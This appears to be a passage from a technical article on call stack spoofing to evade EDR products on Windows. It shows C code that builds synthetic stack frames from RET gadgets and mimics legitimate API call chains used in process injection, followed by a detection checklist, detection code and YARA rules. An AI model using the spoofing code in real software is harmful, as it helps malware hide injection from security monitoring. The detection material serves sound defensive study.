// Random gadget selection
DWORD dwGadgetIdx = (GetPseudoRandom() + i) % pGadgets->dwCount;
PVOID pGadget = pGadgets->pGadgets[dwGadgetIdx];
// Random shadow space padding (still 32+ bytes)
DWORD dwPadding = 32 + (GetPseudoRandom() % 32);
pCurrent -= dwPadding;
// Return address
pCurrent -= 8;
*(PVOID*)pCurrent = (i == 0) ? pRealReturn : pGadget;
// Saved RBP
pCurrent -= 8;
*(PVOID*)pCurrent = pNextRbp;
pNextRbp = pCurrent;
}
pStack->pStackTop = pCurrent;
return pCurrent;
}
The most sophisticated spoofing mimics the exact call chain that legitimate API calls produce:
#include <windows.h>
// Known API call chain patterns
typedef struct _CALL_CHAIN {
const char* szApiName;
const wchar_t* wszModuleChain[8]; // Module names in order
} CALL_CHAIN, *PCALL_CHAIN;
// Example known patterns
CALL_CHAIN g_KnownChains[] = {
{
"NtAllocateVirtualMemory",
{ L"ntdll.dll", L"kernelbase.dll", L"kernel32.dll", NULL }
},
{
"NtWriteVirtualMemory",
{ L"ntdll.dll", L"kernelbase.dll", L"kernel32.dll", NULL }
},
{
"NtCreateThreadEx",
{ L"ntdll.dll", L"kernelbase.dll", L"kernel32.dll", NULL }
},
{ NULL, { NULL } }
};
// Build stack matching a specific API's expected chain
BOOL BuildRealisticChain(
PSPOOF_STACK pStack,
const char* szTargetApi,
PVOID pRealReturn
) {
// Find the expected chain
PCALL_CHAIN pChain = NULL;
for (int i = 0; g_KnownChains[i].szApiName; i++) {
if (strcmp(g_KnownChains[i].szApiName, szTargetApi) == 0) {
pChain = &g_KnownChains[i];
break;
}
}
if (!pChain) return FALSE;
// Build stack with gadgets from the correct modules in order
PBYTE pCurrent = pStack->bMemory + sizeof(pStack->bMemory);
pCurrent -= 256;
pCurrent = (PBYTE)((ULONG_PTR)pCurrent & ~0xF);
PVOID pNextRbp = NULL;
BOOL bFirstFrame = TRUE;
for (int i = 0; pChain->wszModuleChain[i]; i++) {
HMODULE hMod = GetModuleHandleW(pChain->wszModuleChain[i]);
if (!hMod) continue;
PVOID pGadget = FindRetGadget(hMod);
if (!pGadget) continue;
// Build frame
pCurrent -= 32; // Shadow space
pCurrent -= 8; // Return address
*(PVOID*)pCurrent = bFirstFrame ? pRealReturn : pGadget;
bFirstFrame = FALSE;
pCurrent -= 8; // Saved RBP
*(PVOID*)pCurrent = pNextRbp;
pNextRbp = pCurrent;
}
pStack->pStackTop = pCurrent;
return TRUE;
}
Understanding detection helps both defenders and offensive operators. Here are the key indicators of stack spoofing:
STACK SPOOFING DETECTION CHECKLIST
==================================
┌────────────────────────────────────────────────────────────────────┐
│ INDICATOR │ DETECTION METHOD │
├──────────────────────────────────┼────────────────────────────────┤
│ RSP outside thread stack limits │ Compare RSP to TEB stack info │
│ │ GetCurrentThreadStackLimits() │
├──────────────────────────────────┼────────────────────────────────┤
│ All returns to RET gadgets │ Disassemble at each return │
│ │ address; check if just "ret" │
├──────────────────────────────────┼────────────────────────────────┤
│ Return not after CALL │ Check bytes before return addr │
│ │ for a CALL (E8 at -5, FF /2) │
├──────────────────────────────────┼────────────────────────────────┤
│ Missing RUNTIME_FUNCTION │ RtlLookupFunctionEntry returns │
│ │ NULL for return addresses │
├──────────────────────────────────┼────────────────────────────────┤
│ Impossible call chain │ Cross-reference known API │
│ │ calling patterns │
├──────────────────────────────────┼────────────────────────────────┤
│ Uniform frame sizes │ Measure distance between saved │
│ │ RBP values; too regular? │
└────────────────────────────────────────────────────────────────────┘
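Two rows of the table, the stack-limit check and the uniform-frame-size check, need nothing more than comparisons on values the analyzer has already collected. The following is a minimal sketch with illustrative names. The inputs are assumed to have been gathered elsewhere, for example from the TEB and from a frame walk.

```c
#include <stddef.h>
#include <stdint.h>

/* Return 1 if addr lies inside [stack_limit, stack_base), the range
   the TEB records for the thread's stack (limit = lowest address,
   base = highest). */
int within_thread_stack(uint64_t stack_limit, uint64_t stack_base,
                        uint64_t addr)
{
    return addr >= stack_limit && addr < stack_base;
}

/* Return 1 if every gap between consecutive frame pointers is the
   same. Real call stacks mix functions with different frame sizes,
   so identical gaps across many frames are a hint (not proof) that
   the frames were generated mechanically. Fewer than min_frames
   entries (or fewer than 3) is treated as too little evidence. */
int frames_look_uniform(const uint64_t *frame_ptrs, size_t count,
                        size_t min_frames)
{
    if (count < 3 || count < min_frames)
        return 0;
    uint64_t first_gap = frame_ptrs[1] - frame_ptrs[0];
    for (size_t i = 2; i < count; i++) {
        if (frame_ptrs[i] - frame_ptrs[i - 1] != first_gap)
            return 0;
    }
    return 1;
}
```

A chain whose frames all sit 0x30 bytes apart (32 bytes of shadow space plus a return address and a saved RBP) would trip frames_look_uniform. The threshold passed as min_frames is a tuning choice and is not specified by the source.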
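#include <windows.h>
#include <winternl.h>
#include <stdio.h>
// THREAD_BASIC_INFORMATION layout (information class 0). winternl.h does not
// declare it, so a local copy is defined here.
typedef struct _THREAD_BASIC_INFO {
    NTSTATUS ExitStatus;
    PVOID TebBaseAddress;
    CLIENT_ID ClientId;
    ULONG_PTR AffinityMask;
    LONG Priority;
    LONG BasePriority;
} THREAD_BASIC_INFO;
typedef NTSTATUS (NTAPI* fnNtQueryInformationThread)(
    HANDLE, ULONG, PVOID, ULONG, PULONG);
// Check if a stack appears to be spoofed.
// hThread must be a suspended thread in the current process (not the caller):
// GetThreadContext is unreliable for a running thread, and the walk below
// dereferences the target's stack directly.
BOOL DetectStackSpoof(HANDLE hThread) {
    CONTEXT ctx = { 0 };
    ctx.ContextFlags = CONTEXT_FULL;
    if (!GetThreadContext(hThread, &ctx)) {
        return FALSE;
    }
    // Get the target thread's stack boundaries from its own TEB
    fnNtQueryInformationThread pQuery = (fnNtQueryInformationThread)GetProcAddress(
        GetModuleHandleW(L"ntdll.dll"), "NtQueryInformationThread");
    THREAD_BASIC_INFO tbi = { 0 };
    if (!pQuery || pQuery(hThread, 0, &tbi, sizeof(tbi), NULL) < 0 ||
        !tbi.TebBaseAddress) {
        return FALSE;
    }
    NT_TIB* pTib = (NT_TIB*)tbi.TebBaseAddress;
    DWORD64 qwStackBase = (DWORD64)pTib->StackBase;   // highest address
    DWORD64 qwStackLimit = (DWORD64)pTib->StackLimit; // lowest committed address
    // Check 1: RSP within stack limits
    if (ctx.Rsp < qwStackLimit || ctx.Rsp >= qwStackBase) {
        printf("[!] RSP (0x%llX) outside stack bounds!\n", ctx.Rsp);
        return TRUE; // Spoofed!
    }
    // Walk frames and analyze. RBP is a frame pointer only in some x64
    // functions, so treat the results of this walk as heuristics.
    DWORD64 dwRbp = ctx.Rbp;
    int nGadgetReturns = 0;
    int nFrames = 0;
    while (dwRbp && nFrames < 20) {
        // Check that both the saved RBP and the return address slot are in bounds
        if (dwRbp < qwStackLimit || dwRbp + 16 > qwStackBase) {
            printf("[!] Frame %d: RBP outside stack\n", nFrames);
            return TRUE;
        }
        DWORD64 dwRetAddr = *(DWORD64*)(dwRbp + 8);
        // Check for RUNTIME_FUNCTION. Code that made a call is never a leaf,
        // so a missing entry points to JIT or unbacked code.
        DWORD64 dwImageBase = 0;
        PRUNTIME_FUNCTION pRtFunc = RtlLookupFunctionEntry(
            dwRetAddr, &dwImageBase, NULL);
        if (!pRtFunc) {
            printf("[?] Frame %d: No RUNTIME_FUNCTION for return address\n", nFrames);
        }
        // Check if return address is just a RET gadget
        __try {
            if (*(BYTE*)dwRetAddr == 0xC3) {
                nGadgetReturns++;
            }
        }
        __except(EXCEPTION_EXECUTE_HANDLER) {}
        // Older frames live at higher addresses; reject loops and descents
        DWORD64 dwNextRbp = *(DWORD64*)dwRbp;
        if (dwNextRbp && dwNextRbp <= dwRbp) {
            printf("[!] Frame %d: RBP chain does not ascend\n", nFrames);
            return TRUE;
        }
        dwRbp = dwNextRbp;
        nFrames++;
    }
    // Heuristic: Multiple returns to bare RET is suspicious
    if (nGadgetReturns > 2) {
        printf("[!] %d frames return to RET gadgets!\n", nGadgetReturns);
        return TRUE;
    }
    return FALSE;
}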
rule Callstack_Spoof_Gadget_Search {
meta:
description = "Detects code that searches for RET gadgets"
strings:
// Searching for 0xC3 (RET) byte
$gadget_search1 = { 80 ?? C3 } // cmp [reg], 0xC3
$gadget_search2 = { 3C C3 } // cmp al, 0xC3
// Searching for 0x5D 0xC3 (pop rbp; ret)
$gadget_search3 = { 66 81 ?? 5D C3 }
// RtlLookupFunctionEntry for validation bypass
$unwind_api = "RtlLookupFunctionEntry" ascii
// Stack limit checking (possible evasion)
$stack_check = "NtQueryInformationThread" ascii
condition:
any of ($gadget_search*) and ($unwind_api or $stack_check)
}
rule Suspicious_Stack_Manipulation {
meta:
description = "Detects unusual stack pointer manipulation"
strings:
// Direct RSP assignment (stack switching)
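$rsp_mov1 = { 48 8B ( E0 | E1 | E2 | E3 | E5 | E6 | E7 ) } // mov rsp, r64 (8B encoding)
$rsp_mov2 = { ( 48 | 49 ) 8B ( 2? | 6? | A? ) } // mov rsp/rbp, [mem]
// RBP chain manipulation
$rbp_chain = { 48 89 ?? 48 89 ?? } // Two consecutive 64-bit MOV stores (weak signal: common in benign code)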
// Get return address pattern
$ret_addr = { 48 8B 04 24 } // mov rax, [rsp]
condition:
2 of them
}
Callstack spoofing is a sophisticated technique that exploits the gap between how EDRs analyze execution context and how that context can be artificially constructed.
TECHNIQUE EFFECTIVENESS SUMMARY
===============================
┌────────────────────────────────┬────────────┬────────────┬─────────────┐
│ Technique │ Complexity │ Stealth │ Robustness │
├────────────────────────────────┼────────────┼────────────┼─────────────┤
│ Simple return addr replacement │ Low │ Low │ Low │
│ RET gadget chains │ Medium │ Medium │ Medium │
│ Full synthetic frames │ High │ High │ High │
│ Realistic call chains │ Very High │ Very High │ High │
│ + Randomization │ Very High │ Very High │ Very High │
└────────────────────────────────┴────────────┴────────────┴─────────────┘
Best Practices: